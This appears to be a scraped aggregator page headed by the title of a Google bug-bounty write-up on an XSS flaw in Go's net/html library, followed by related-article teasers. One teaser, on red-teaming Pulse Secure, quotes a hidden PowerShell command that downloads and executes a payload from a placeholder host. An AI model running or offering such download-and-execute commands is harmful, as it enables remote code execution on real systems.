
$3,133.70 XSS in golang’s net/html library – My first Google bug bounty

Source link
Related Articles
All Mix →Liberals and Conservatives: An Amazingly Accurate Oversimplification
Simply stated, liberals have a better vision of what the world should look like, but are generally incapable of developing policies consistent with getting us…
Wanna hack zseano website and get paid? – Bounty Thursdays #28
Wanna hack zseano website and get paid? – Bounty Thursdays #28 Source link
Hacking Pulse Secure for Redteaming
The code we used for the batch script is below. @echo off powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://your-ip/payload))” Setting up Cobalt Strike Now…
Assign severity ratings on Attack Surface Custom Policies
Table of Contents Assign severity to policy breaches Setting rules on fingerprinted technologies now possible Additional product updates: Already using Detectify? Assign severity to policy…
The Voices of Vulnerability Disclosure: Look Who’s Talking About VDPs
The attention being given to vulnerability disclosure policies (VDP) in the past year has increased dramatically. It might be the latest high-profile breach that sparks…
HackerOne Reputation – Increasing Valid Bug Submissions and Signals
Edited on 12/11/2015 to reflect the latest Reputation implementation. One of the primary challenges when running a vulnerability coordination program is distinguishing signal from noise.…